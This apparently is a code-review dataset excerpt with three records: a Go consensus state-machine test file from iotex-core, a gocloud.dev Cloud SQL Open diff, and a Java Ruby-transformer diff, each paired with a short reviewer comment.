cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) assert.NoError(t, err) assert.Equal(t, sAcceptPropose, state) state, err = cfsm.handleProposeBlockTimeout(cfsm.newCEvt(eProposeBlockTimeout)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) }) t.Run("timeout", func(t *testing.T) { cfsm := newTestCFSM( t, testAddrs[2], testAddrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().ValidateBlock(gomock.Any(), gomock.Any()).Times(0) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(0) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round state, err := cfsm.handleProposeBlockTimeout(cfsm.newCEvt(eProposeBlockTimeout)) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) }) } func TestHandleProposalEndorseEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 4) for i := 0; i < 4; i++ { delegates[i] = testAddrs[i].RawAddress } epoch := epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(1), } round := roundCtx{ endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[2], } t.Run("gather-endorses", func(t *testing.T) { cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(1) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) cfsm.ctx.round.block = blk // First endorse prepare eEvt := newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[0], cfsm.ctx.clock) state, err := cfsm.handleEndorseProposalEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) // Second endorse prepare eEvt = newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[1], cfsm.ctx.clock) state, err = cfsm.handleEndorseProposalEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptProposalEndorse, state) // Third endorse prepare, could move on eEvt = newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[2], cfsm.ctx.clock) state, err = cfsm.handleEndorseProposalEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptLockEndorse, state) e := <-cfsm.evtq evt, ok := e.(*endorseEvt) require.True(t, ok) assert.Equal(t, eEndorseLock, evt.Type()) }) t.Run("timeout", func(t *testing.T) { cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) }, nil, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round blk, err := cfsm.ctx.mintCommonBlock() assert.NoError(t, err) cfsm.ctx.round.block = blk state, err := cfsm.handleEndorseProposalTimeout(cfsm.newCEvt(eEndorseProposalTimeout)) assert.NoError(t, err) assert.Equal(t, sAcceptLockEndorse, state) }) } func TestHandleCommitEndorseEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 21) test21Addrs := test21Addrs() for i, addr := range test21Addrs { delegates[i] = addr.RawAddress } round := roundCtx{ endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[2], } t.Run("gather-commits-secret-block", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().CommitBlock(gomock.Any()).Return(nil).Times(1) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(2) }, clock.New(), ) cfsm.ctx.epoch.numSubEpochs = uint(2) cfsm.ctx.epoch.subEpochNum = uint64(0) cfsm.ctx.epoch.delegates = delegates cfsm.ctx.epoch.committedSecrets = make(map[string][]uint32) cfsm.ctx.round = round blk, err := cfsm.ctx.mintBlock() assert.NoError(t, err) cfsm.ctx.round.block = blk for i := 0; i < 14; i++ { eEvt := newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, test21Addrs[i], cfsm.ctx.clock) state, err := cfsm.handleEndorseLockEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptLockEndorse, state) assert.Equal(t, 0, len(cfsm.ctx.epoch.committedSecrets)) } // 15th endorse prepare, could move on eEvt := newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, test21Addrs[14], cfsm.ctx.clock) state, err := cfsm.handleEndorseLockEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptCommitEndorse, state) evt := <-cfsm.evtq assert.Equal(t, eEndorseCommit, evt.Type()) state, err = cfsm.handleEndorseCommitEvt(evt) assert.NoError(t, err) assert.Equal(t, sRoundStart, state) assert.Equal(t, eFinishEpoch, (<-cfsm.evtq).Type()) assert.Equal(t, 1, len(cfsm.ctx.epoch.committedSecrets)) }) t.Run("gather-commits-common-block", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().CommitBlock(gomock.Any()).Return(nil).Times(1) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(2) }, clock.New(), ) cfsm.ctx.epoch.numSubEpochs = uint(2) cfsm.ctx.epoch.subEpochNum = uint64(1) cfsm.ctx.epoch.delegates = delegates cfsm.ctx.round = round blk, err := cfsm.ctx.mintBlock() assert.NoError(t, err) cfsm.ctx.round.block = blk for i := 0; i < 14; i++ { eEvt := newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, test21Addrs[i], cfsm.ctx.clock) state, err := cfsm.handleEndorseLockEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptLockEndorse, state) } // 15th endorse prepare, could move on eEvt := newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, test21Addrs[14], cfsm.ctx.clock) state, err := cfsm.handleEndorseLockEvt(eEvt) assert.NoError(t, err) assert.Equal(t, sAcceptCommitEndorse, state) evt := <-cfsm.evtq assert.Equal(t, eEndorseCommit, evt.Type()) state, err = cfsm.handleEndorseCommitEvt(evt) assert.NoError(t, err) assert.Equal(t, sRoundStart, state) assert.Equal(t, eFinishEpoch, (<-cfsm.evtq).Type()) }) t.Run("timeout-blocking", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().CommitBlock(gomock.Any()).Return(nil).Times(0) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(0) }, clock.New(), ) blk, err := cfsm.ctx.mintBlock() assert.NoError(t, err) cfsm.ctx.round.block = blk state, err := cfsm.handleEndorseLockTimeout(cfsm.newCEvt(eEndorseLockTimeout)) assert.NoError(t, err) assert.Equal(t, sRoundStart, state) assert.Equal(t, eFinishEpoch, (<-cfsm.evtq).Type()) }) } func TestOneDelegate(t *testing.T) { require := require.New(t) ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := []string{testAddrs[0].RawAddress} epoch := epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(1), } round := roundCtx{ height: 2, endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[0], } cfsm := newTestCFSM( t, testAddrs[0], testAddrs[0], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().CommitBlock(gomock.Any()).Return(nil).Times(1) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().TipHeight().Return(uint64(2)).Times(1) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(4) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round cfsm.ctx.cfg.EnableDKG = false // propose block blk, err := cfsm.ctx.mintCommonBlock() require.NoError(err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) require.Equal(sAcceptProposalEndorse, state) require.NoError(err) evt := <-cfsm.evtq eEvt, ok := evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseProposal, eEvt.Type()) // endorse proposal state, err = cfsm.handleEndorseProposalEvt(eEvt) require.Equal(sAcceptLockEndorse, state) require.NoError(err) evt = <-cfsm.evtq eEvt, ok = evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseLock, eEvt.Type()) // endorse lock state, err = cfsm.handleEndorseLockEvt(eEvt) require.NoError(err) require.Equal(sAcceptCommitEndorse, state) evt = <-cfsm.evtq eEvt, ok = evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseCommit, eEvt.Type()) // endorse commit state, err = cfsm.handleEndorseCommitEvt(eEvt) require.NoError(err) require.Equal(sRoundStart, state) evt = <-cfsm.evtq cEvt, ok := evt.(*consensusEvt) require.True(ok) require.Equal(eFinishEpoch, cEvt.Type()) // new round state, err = cfsm.handleFinishEpochEvt(cEvt) require.Equal(sEpochStart, state) require.NoError(err) } func TestTwoDelegates(t *testing.T) { require := require.New(t) ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := []string{testAddrs[0].RawAddress, testAddrs[1].RawAddress} epoch := epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(2), } round := roundCtx{ height: 2, endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[0], } cfsm := newTestCFSM( t, testAddrs[0], testAddrs[0], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().CommitBlock(gomock.Any()).Return(nil).Times(1) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().TipHeight().Return(uint64(2)).Times(2) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(4) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round cfsm.ctx.cfg.EnableDKG = false // propose block blk, err := cfsm.ctx.mintCommonBlock() require.NoError(err) state, err := cfsm.handleProposeBlockEvt(newProposeBlkEvt(blk, nil, cfsm.ctx.round.number, cfsm.ctx.clock)) require.Equal(sAcceptProposalEndorse, state) require.NoError(err) evt := <-cfsm.evtq eEvt, ok := evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseProposal, eEvt.Type()) // endorse proposal state, err = cfsm.handleEndorseProposalEvt(eEvt) require.Equal(sAcceptProposalEndorse, state) require.NoError(err) eEvt = newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[1], cfsm.ctx.clock) state, err = cfsm.handleEndorseProposalEvt(eEvt) require.Equal(sAcceptLockEndorse, state) require.NoError(err) evt = <-cfsm.evtq eEvt, ok = evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseLock, eEvt.Type()) // endorse lock state, err = cfsm.handleEndorseLockEvt(eEvt) require.Equal(sAcceptLockEndorse, state) require.NoError(err) eEvt = newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, testAddrs[1], cfsm.ctx.clock) state, err = cfsm.handleEndorseLockEvt(eEvt) require.Equal(sAcceptCommitEndorse, state) require.NoError(err) evt = <-cfsm.evtq eEvt, ok = evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseCommit, eEvt.Type()) // endorse lock state, err = cfsm.handleEndorseCommitEvt(eEvt) require.NoError(err) require.Equal(sRoundStart, state) evt = <-cfsm.evtq cEvt, ok := evt.(*consensusEvt) require.True(ok) require.Equal(eFinishEpoch, cEvt.Type()) // new round state, err = cfsm.handleFinishEpochEvt(cEvt) require.Equal(sRoundStart, state) require.NoError(err) } func TestThreeDelegates(t *testing.T) { require := require.New(t) ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := []string{testAddrs[0].RawAddress, testAddrs[1].RawAddress, testAddrs[2].RawAddress} epoch := epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(3), } round := roundCtx{ height: 2, endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[2], } cfsm := newTestCFSM( t, testAddrs[0], testAddrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().CommitBlock(gomock.Any()).Return(nil).Times(1) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().TipHeight().Return(uint64(2)).Times(2) }, func(p2p *mock_network.MockOverlay) { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).Times(3) }, clock.New(), ) cfsm.ctx.epoch = epoch cfsm.ctx.round = round cfsm.ctx.cfg.EnableDKG = false blk, err := cfsm.ctx.mintCommonBlock() require.NoError(err) cfsm.ctx.round.block = blk // endorse proposal // handle self endorsement eEvt := newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[0], cfsm.ctx.clock) state, err := cfsm.handleEndorseProposalEvt(eEvt) require.Equal(sAcceptProposalEndorse, state) require.NoError(err) // handle delegate 1's endorsement eEvt = newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[1], cfsm.ctx.clock) state, err = cfsm.handleEndorseProposalEvt(eEvt) require.Equal(sAcceptProposalEndorse, state) require.NoError(err) // handle delegate 2's endorsement eEvt = newEndorseEvt(endorsement.PROPOSAL, blk.HashBlock(), round.height, round.number, testAddrs[2], cfsm.ctx.clock) state, err = cfsm.handleEndorseProposalEvt(eEvt) require.Equal(sAcceptLockEndorse, state) require.NoError(err) evt := <-cfsm.evtq eEvt, ok := evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseLock, eEvt.Type()) // endorse lock // handle self endorsement state, err = cfsm.handleEndorseLockEvt(eEvt) require.Equal(sAcceptLockEndorse, state) require.NoError(err) // handle delegate 1's endorsement eEvt = newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, testAddrs[1], cfsm.ctx.clock) state, err = cfsm.handleEndorseLockEvt(eEvt) require.Equal(sAcceptLockEndorse, state) require.NoError(err) // handle delegate 2's endorsement eEvt = newEndorseEvt(endorsement.LOCK, blk.HashBlock(), round.height, round.number, testAddrs[2], cfsm.ctx.clock) state, err = cfsm.handleEndorseLockEvt(eEvt) require.NoError(err) require.Equal(sAcceptCommitEndorse, state) evt = <-cfsm.evtq eEvt, ok = evt.(*endorseEvt) require.True(ok) require.Equal(eEndorseCommit, eEvt.Type()) state, err = cfsm.handleEndorseCommitEvt(eEvt) require.NoError(err) require.Equal(sRoundStart, state) evt = <-cfsm.evtq cEvt, ok := evt.(*consensusEvt) require.True(ok) require.Equal(eFinishEpoch, cEvt.Type()) // new round state, err = cfsm.handleFinishEpochEvt(cEvt) require.Equal(sRoundStart, state) require.NoError(err) } func TestHandleFinishEpochEvt(t *testing.T) { t.Parallel() ctrl := gomock.NewController(t) defer ctrl.Finish() delegates := make([]string, 21) test21Addrs := test21Addrs() for i, addr := range test21Addrs { delegates[i] = addr.RawAddress } epoch := epochCtx{ delegates: delegates, num: uint64(1), height: uint64(1), numSubEpochs: uint(2), } round := roundCtx{ endorsementSets: make(map[hash.Hash32B]*endorsement.Set), proposer: delegates[2], } t.Run("dkg-not-finished", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().TipHeight().Return(uint64(1)).Times(3) }, nil, clock.New(), ) epoch.subEpochNum = uint64(0) cfsm.ctx.epoch = epoch cfsm.ctx.round = round state, err := cfsm.handleFinishEpochEvt(cfsm.newCEvt(eFinishEpoch)) assert.NoError(t, err) assert.Equal(t, sRoundStart, state) assert.Equal(t, eStartRound, (<-cfsm.evtq).Type()) assert.Nil(t, cfsm.ctx.epoch.dkgAddress.PublicKey) assert.Nil(t, cfsm.ctx.epoch.dkgAddress.PrivateKey) }) t.Run("dkg-finished", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().TipHeight().Return(uint64(21)).Times(3) }, nil, clock.New(), ) epoch.subEpochNum = uint64(0) epoch.committedSecrets = make(map[string][]uint32) cfsm.ctx.epoch = epoch cfsm.ctx.round = round idList := make([][]uint8, 0) for _, addr := range delegates { dkgID := iotxaddress.CreateID(addr) idList = append(idList, dkgID) } for i, delegate := range delegates { _, secrets, _, err := crypto.DKG.Init(crypto.DKG.SkGeneration(), idList) assert.NoError(t, err) assert.NotNil(t, secrets) if i%2 != 0 { cfsm.ctx.epoch.committedSecrets[delegate] = secrets[0] } } state, err := cfsm.handleFinishEpochEvt(cfsm.newCEvt(eFinishEpoch)) assert.NoError(t, err) assert.Equal(t, sRoundStart, state) assert.Equal(t, eStartRound, (<-cfsm.evtq).Type()) assert.NotNil(t, cfsm.ctx.epoch.dkgAddress.PublicKey) assert.NotNil(t, cfsm.ctx.epoch.dkgAddress.PrivateKey) }) t.Run("epoch-not-finished", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().TipHeight().Return(uint64(22)).Times(2) }, nil, clock.New(), ) epoch.subEpochNum = uint64(1) cfsm.ctx.epoch = epoch cfsm.ctx.round = round state, err := cfsm.handleFinishEpochEvt(cfsm.newCEvt(eFinishEpoch)) assert.NoError(t, err) assert.Equal(t, sRoundStart, state) assert.Equal(t, eStartRound, (<-cfsm.evtq).Type()) }) t.Run("epoch-finished", func(t *testing.T) { cfsm := newTestCFSM( t, test21Addrs[0], test21Addrs[2], ctrl, delegates, func(chain *mock_blockchain.MockBlockchain) { chain.EXPECT().TipHeight().Return(uint64(42)).Times(1) chain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) chain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) }, nil, clock.New(), ) epoch.subEpochNum = uint64(1) cfsm.ctx.epoch = epoch cfsm.ctx.round = round state, err := cfsm.handleFinishEpochEvt(cfsm.newCEvt(eFinishEpoch)) assert.NoError(t, err) assert.Equal(t, sEpochStart, state) assert.Equal(t, eRollDelegates, (<-cfsm.evtq).Type()) }) } func newTestCFSM( t *testing.T, addr *iotxaddress.Address, proposer *iotxaddress.Address, ctrl *gomock.Controller, delegates []string, mockChain func(*mock_blockchain.MockBlockchain), mockP2P func(*mock_network.MockOverlay), clock clock.Clock, ) *cFSM { transfer, err := action.NewTransfer(1, big.NewInt(100), "src", "dst", []byte{}, uint64(100000), big.NewInt(10)) require.NoError(t, err) selfPubKey := testaddress.Addrinfo["producer"].PublicKey require.NoError(t, err) selfPubKeyHash := keypair.HashPubKey(selfPubKey) address := address.New(config.Default.Chain.ID, selfPubKeyHash[:]) vote, err := action.NewVote(2, address.IotxAddress(), address.IotxAddress(), uint64(100000), big.NewInt(10)) require.NoError(t, err) var prevHash hash.Hash32B lastBlk := blockchain.NewBlock( config.Default.Chain.ID, 1, prevHash, testutil.TimestampNowFromClock(clock), proposer.PublicKey, make([]action.Action, 0), ) blkToMint := blockchain.NewBlock( config.Default.Chain.ID, 2, lastBlk.HashBlock(), testutil.TimestampNowFromClock(clock), proposer.PublicKey, []action.Action{transfer, vote}, ) blkToMint.SignBlock(proposer) var secretBlkToMint *blockchain.Block var proposerSecrets [][]uint32 var proposerWitness [][]byte if len(delegates) == 21 { idList := make([][]uint8, 0) for _, addr := range delegates { dkgID := iotxaddress.CreateID(addr) idList = append(idList, dkgID) } _, secrets, witness, err := crypto.DKG.Init(crypto.DKG.SkGeneration(), idList) require.NoError(t, err) proposerSecrets = secrets proposerWitness = witness nonce := uint64(1) secretProposals := make([]*action.SecretProposal, 0) for i, delegate := range delegates { secretProposal, err := action.NewSecretProposal(nonce, proposer.RawAddress, delegate, secrets[i]) require.NoError(t, err) secretProposals = append(secretProposals, secretProposal) nonce++ } secretWitness, err := action.NewSecretWitness(nonce, proposer.RawAddress, witness) require.NoError(t, err) secretBlkToMint = blockchain.NewSecretBlock( config.Default.Chain.ID, 2, lastBlk.HashBlock(), testutil.TimestampNowFromClock(clock), proposer.PublicKey, secretProposals, secretWitness, ) secretBlkToMint.SignBlock(proposer) } ctx := makeTestRollDPoSCtx( addr, ctrl, config.RollDPoS{ AcceptProposeTTL: 300 * time.Millisecond, AcceptProposalEndorseTTL: 300 * time.Millisecond, AcceptCommitEndorseTTL: 300 * time.Millisecond, EventChanSize: 2, NumDelegates: uint(len(delegates)), EnableDKG: true, }, func(blockchain *mock_blockchain.MockBlockchain) { blockchain.EXPECT().ChainID().AnyTimes().Return(config.Default.Chain.ID) blockchain.EXPECT().ChainAddress().AnyTimes().Return(config.Default.Chain.Address) blockchain.EXPECT().GetBlockByHeight(uint64(1)).Return(lastBlk, nil).AnyTimes() blockchain.EXPECT().GetBlockByHeight(uint64(2)).Return(lastBlk, nil).AnyTimes() blockchain.EXPECT().GetBlockByHeight(uint64(21)).Return(lastBlk, nil).AnyTimes() blockchain.EXPECT().GetBlockByHeight(uint64(22)).Return(lastBlk, nil).AnyTimes() blockchain.EXPECT(). MintNewBlock(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(blkToMint, nil).AnyTimes() blockchain.EXPECT(). MintNewSecretBlock(gomock.Any(), gomock.Any(), gomock.Any()).Return(secretBlkToMint, nil).AnyTimes() blockchain.EXPECT(). Nonce(gomock.Any()).Return(uint64(0), nil).AnyTimes() if mockChain == nil { candidates := make([]*state.Candidate, 0) for _, delegate := range delegates { candidates = append(candidates, &state.Candidate{Address: delegate}) } blockchain.EXPECT().CandidatesByHeight(gomock.Any()).Return(candidates, nil).AnyTimes() blockchain.EXPECT().TipHeight().Return(uint64(1)).AnyTimes() blockchain.EXPECT().ValidateBlock(gomock.Any(), gomock.Any()).Return(nil).AnyTimes() } else { mockChain(blockchain) } }, func(actPool *mock_actpool.MockActPool) { actPool.EXPECT(). PickActs(). Return([]action.Action{transfer, vote}). AnyTimes() actPool.EXPECT().Reset().AnyTimes() }, func(p2p *mock_network.MockOverlay) { if mockP2P == nil { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).AnyTimes() } else { mockP2P(p2p) } }, clock, ) ctx.epoch.delegates = delegates ctx.epoch.secrets = proposerSecrets ctx.epoch.witness = proposerWitness cfsm, err := newConsensusFSM(ctx) require.Nil(t, err) require.NotNil(t, cfsm) return cfsm } func newTestAddr() *iotxaddress.Address { pk, sk, err := crypto.EC283.NewKeyPair() if err != nil { logger.Panic().Err(err).Msg("error when creating test IoTeX address") } pkHash := keypair.HashPubKey(pk) addr := address.New(config.Default.Chain.ID, pkHash[:]) iotxAddr := iotxaddress.Address{ PublicKey: pk, PrivateKey: sk, RawAddress: addr.IotxAddress(), } return &iotxAddr } func test21Addrs() []*iotxaddress.Address { addrs := make([]*iotxaddress.Address, 0) for i := 0; i < 21; i++ { addrs = append(addrs, newTestAddr()) } return addrs }
1
13,381
line is 138 characters
iotexproject-iotex-core
go
@@ -75,8 +75,9 @@ type Params struct { TraceOpts []ocsql.TraceOption } -// Open opens a Cloud SQL database. -func Open(ctx context.Context, certSource proxy.CertSource, params *Params) (*sql.DB, error) { +// Open opens a Cloud SQL database. The second return value is a Wire cleanup +// function that calls Close on the returned database. +func Open(ctx context.Context, certSource proxy.CertSource, params *Params) (*sql.DB, func(), error) { // TODO(light): Avoid global registry once https://github.com/go-sql-driver/mysql/issues/771 is fixed. dialerCounter.mu.Lock() dialerNum := dialerCounter.n
1
// Copyright 2018 The Go Cloud Development Kit Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // https://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // Package cloudmysql provides connections to managed MySQL Cloud SQL instances. package cloudmysql // import "gocloud.dev/mysql/cloudmysql" import ( "context" "database/sql" "database/sql/driver" "fmt" "sync" "contrib.go.opencensus.io/integrations/ocsql" "github.com/GoogleCloudPlatform/cloudsql-proxy/proxy/certs" "github.com/GoogleCloudPlatform/cloudsql-proxy/proxy/proxy" "github.com/go-sql-driver/mysql" "gocloud.dev/gcp" "gocloud.dev/gcp/cloudsql" // mysql enables use of the MySQL dialer for the Cloud SQL Proxy. _ "github.com/GoogleCloudPlatform/cloudsql-proxy/proxy/dialers/mysql" ) // CertSourceSet is a Wire provider set that binds a Cloud SQL proxy // certificate source from an GCP-authenticated HTTP client. // // Deprecated: Use cloudsql.CertSourceSet. var CertSourceSet = cloudsql.CertSourceSet // NewCertSource creates a local certificate source that uses the given // HTTP client. The client is assumed to make authenticated requests. // // Deprecated: Use cloudsql.NewCertSource. func NewCertSource(c *gcp.HTTPClient) *certs.RemoteCertSource { return cloudsql.NewCertSource(c) } // Params specifies how to connect to a Cloud SQL database. type Params struct { // ProjectID specifies the GCP project associated with the // CloudSQL instance. ProjectID string // Region is the GCP region containing the CloudSQL instance. Region string // Instance is the CloudSQL instance name. See // https://cloud.google.com/sql/docs/mysql/create-instance // for background. Instance string // User is the username used to connect to the database. User string // Password is the password used to connect to the database. // It may be empty, see https://cloud.google.com/sql/docs/sql-proxy#user Password string // Database is the name of the database to connect to. Database string // TraceOpts contains options for OpenCensus. TraceOpts []ocsql.TraceOption } // Open opens a Cloud SQL database. func Open(ctx context.Context, certSource proxy.CertSource, params *Params) (*sql.DB, error) { // TODO(light): Avoid global registry once https://github.com/go-sql-driver/mysql/issues/771 is fixed. dialerCounter.mu.Lock() dialerNum := dialerCounter.n dialerCounter.mu.Unlock() client := &proxy.Client{ Port: 3307, Certs: certSource, } dialerName := fmt.Sprintf("gocloud.dev/mysql/gcpmysql/%d", dialerNum) mysql.RegisterDial(dialerName, client.Dial) cfg := &mysql.Config{ AllowNativePasswords: true, Net: dialerName, Addr: params.ProjectID + ":" + params.Region + ":" + params.Instance, User: params.User, Passwd: params.Password, DBName: params.Database, } return sql.OpenDB(connector{cfg.FormatDSN(), params.TraceOpts}), nil } var dialerCounter struct { mu sync.Mutex n int } type connector struct { dsn string traceOpts []ocsql.TraceOption } func (c connector) Connect(ctx context.Context) (driver.Conn, error) { return c.Driver().Open(c.dsn) } func (c connector) Driver() driver.Driver { return ocsql.Wrap(mysql.MySQLDriver{}, c.traceOpts...) }
1
16,940
Nit: I would leave `Wire` out of the description; if you use this without wire you can still use it.
google-go-cloud
go
@@ -14,10 +14,14 @@ */ package com.google.api.codegen.transformer.ruby; +import com.google.api.codegen.config.MethodConfig; import com.google.api.codegen.transformer.ApiMethodParamTransformer; import com.google.api.codegen.transformer.MethodTransformerContext; +import com.google.api.codegen.transformer.SurfaceNamer; import com.google.api.codegen.viewmodel.DynamicLangDefaultableParamView; import com.google.api.codegen.viewmodel.ParamDocView; +import com.google.api.codegen.viewmodel.SimpleParamDocView; +import com.google.api.tools.framework.model.Field; import com.google.common.collect.ImmutableList; import java.util.List;
1
/* Copyright 2017 Google Inc * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.api.codegen.transformer.ruby; import com.google.api.codegen.transformer.ApiMethodParamTransformer; import com.google.api.codegen.transformer.MethodTransformerContext; import com.google.api.codegen.viewmodel.DynamicLangDefaultableParamView; import com.google.api.codegen.viewmodel.ParamDocView; import com.google.common.collect.ImmutableList; import java.util.List; public class RubyApiMethodParamTransformer implements ApiMethodParamTransformer { @Override public List<DynamicLangDefaultableParamView> generateMethodParams( MethodTransformerContext context) { // TODO(eoogbe): implement this method when migrating to MVVM return ImmutableList.<DynamicLangDefaultableParamView>of(); } @Override public List<ParamDocView> generateParamDocs(MethodTransformerContext context) { // TODO(eoogbe): implement this method when migrating to MVVM return ImmutableList.<ParamDocView>of(); } }
1
21,351
Nit: each field can be on a separate line to make it visually easier to read.
googleapis-gapic-generator
java
